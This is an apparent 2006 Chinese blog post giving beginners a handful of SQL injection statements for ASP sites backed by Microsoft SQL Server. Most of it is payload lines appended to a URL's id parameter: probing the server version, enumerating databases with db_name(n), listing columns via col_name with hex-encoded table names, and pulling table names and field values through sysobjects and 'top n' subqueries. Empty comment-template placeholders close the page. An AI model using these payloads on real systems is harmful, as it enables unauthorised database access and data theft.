Asp脚本注入的几条简单语句[很古老但很实用]

      安全技术文档 2006-6-1 22:28
现在工具到处乱飞,傻瓜"黑客"层出不穷,下面给初入茅庐的朋友们介绍注入的几条简单语句,以供参考.

一、版本
url/1.asp?id=1 and @@VERSION>0
二、跨库
url/1.asp?id=1 and 1=(select db_name(n))
n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?
三、列名
url/1.asp?id=1 and 1=(select col_name(object_id('表名'),n) '表名'可以换成16进制。像bbsuser=0x6200620073007500730065007200(不可以去掉0)
四、表名字段值
select top 1 name from bbs.dbo.sysobjects where xtype='U' and name not in ('表名1,表名2'))
字段值:
select top 1 列名 from 表名 where 列名 not in (select top n 列名 from 表名)
n改1,2,3,4就可以得库名、列名
标签集:TAGS:
回复Comments() 点击Count()

回复Comments

{commenttime}{commentauthor}

{CommentUrl}
{commentcontent}